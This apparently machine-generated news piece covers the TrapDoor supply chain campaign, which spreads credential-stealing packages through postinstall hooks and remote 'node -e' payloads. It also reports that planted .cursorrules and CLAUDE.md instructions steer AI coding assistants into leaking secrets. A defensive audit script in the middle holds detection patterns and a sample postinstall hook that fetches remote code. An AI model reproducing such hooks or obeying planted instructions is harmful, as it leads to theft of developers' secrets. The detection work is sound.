Ethical Hacking News
A new supply chain attack campaign dubbed TrapDoor has been discovered using multiple popular open-source ecosystems to distribute credential-stealing malware. The campaign involves the publication of over 34 malicious packages across npm, PyPI, and Crates.io, each aimed at specific ecosystems and communities, and relies on postinstall hooks, remote JavaScript payloads, and build scripts to execute malicious code and exfiltrate sensitive information from unsuspecting developers. The malicious Python packages can download and run a remote JavaScript payload, giving the attacker more flexibility after publication. The campaign combines traditional package typosquatting with newer developer-environment attack paths, showing how supply chain attacks continue to evolve.
In a disturbing development that highlights the evolving nature of cybersecurity threats, a sophisticated supply chain attack campaign has been discovered that leverages multiple popular open-source ecosystems to distribute credential-stealing malware. The malicious campaign, dubbed TrapDoor, has already shown significant success in its ability to evade detection and steal sensitive information from unsuspecting developers.
According to recent reports, the TrapDoor campaign involves the publication of over 34 malicious packages across npm, PyPI, and Crates.io, with each package designed to target specific ecosystems and communities. The attack is notable for its use of postinstall hooks, remote JavaScript payloads, and build scripts to execute malicious code and exfiltrate sensitive information.
At the heart of the TrapDoor campaign lies a complex network of packages that masquerade as harmless tools, allowing attackers to reach a broad audience. These packages are designed to scan for credentials and developer secrets, validate stolen credentials using AWS and GitHub API calls, and create persistence on the host using cron jobs, systemd services, Git hooks, and SSH.
The malicious Python packages associated with TrapDoor are particularly noteworthy for their ability to download JavaScript from an attacker-controlled domain and run it using "node -e". By delegating execution to a remote JavaScript payload, the package lets the attacker change its behaviour after publication. The campaign also plants hidden instructions in .cursorrules and CLAUDE.md files, a social engineering tactic that tricks artificial intelligence (AI) coding assistants into running a "security scan" that in fact discovers and exfiltrates secrets.
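One defensive check a team could run over its dependency tree, given the install-time hooks and "node -e" delegation described above: audit every npm package.json for auto-run lifecycle scripts that match risky patterns. This is an added example, not code from the article or from any vendor; the regex heuristics and both sample manifests are constructed for illustration and are not indicators published for this campaign.

```python
import json
import re

# Lifecycle hooks npm runs automatically during `npm install`; TrapDoor abused postinstall.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns worth a human look when they appear in an auto-run hook.
# Constructed for this example, not an indicator list from the article.
RISKY_PATTERNS = {
    "inline-node-eval": re.compile(r"\bnode\s+(-e|--eval)\b"),  # "node -e" style remote delegation
    "remote-fetch": re.compile(r"\b(curl|wget|fetch\(|https?://)", re.I),
    "pipe-to-shell": re.compile(r"\|\s*(sh|bash)\b"),
    "secret-paths": re.compile(r"(~|\$HOME)/\.(ssh|aws)|process\.env", re.I),
}


def audit_lifecycle_scripts(package_json_text: str) -> list[dict]:
    """Return one finding per auto-run lifecycle script that matches a risky pattern."""
    manifest = json.loads(package_json_text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in AUTO_RUN_HOOKS:
            continue  # `test`, `build`, etc. only run when a developer asks for them
        hits = [name for name, rx in RISKY_PATTERNS.items() if rx.search(command)]
        if hits:
            findings.append({"package": manifest.get("name", "<unnamed>"),
                             "hook": hook, "command": command, "indicators": hits})
    return findings


# Constructed sample manifests (not real packages) so the audit runs offline.
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "example-typosquat",
    "version": "1.0.0",
    "scripts": {"postinstall": "node -e \"fetch('https://example.invalid/r.js')\"",
                "test": "jest"},
})
BENIGN_MANIFEST = json.dumps({
    "name": "example-legit",
    "version": "2.3.1",
    "scripts": {"postinstall": "node scripts/build-native.js", "test": "jest"},
})

if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        for f in audit_lifecycle_scripts(manifest):
            print(f"[{f['package']}] {f['hook']}: {f['indicators']} -> {f['command']}")
```

In practice the same function would be applied to every package.json under node_modules (or to a lockfile-driven fetch of each dependency's manifest) before the install step is allowed to run its hooks.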
The findings highlight how threat actors are increasingly targeting developer workflows to steal sensitive information that can be used for follow-on attacks. The TrapDoor campaign demonstrates the evolving nature of supply chain attacks, which now often involve combining traditional package typosquatting with newer developer-environment attack paths.
The TrapDoor campaign serves as a wake-up call for developers and organizations alike, emphasizing the importance of staying vigilant in today's digital landscape. As we continue to rely on open-source ecosystems and developer workflows, it is essential that we prioritize cybersecurity awareness and implement robust security measures to protect our sensitive information from these increasingly sophisticated threats.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Layer-of-Deception-The-Sophisticated-TrapDoor-Supply-Chain-Attack-Campaign-ehn.shtml
https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
Published: Mon May 25 02:55:32 2026 by llama3.2 3B Q4_K_M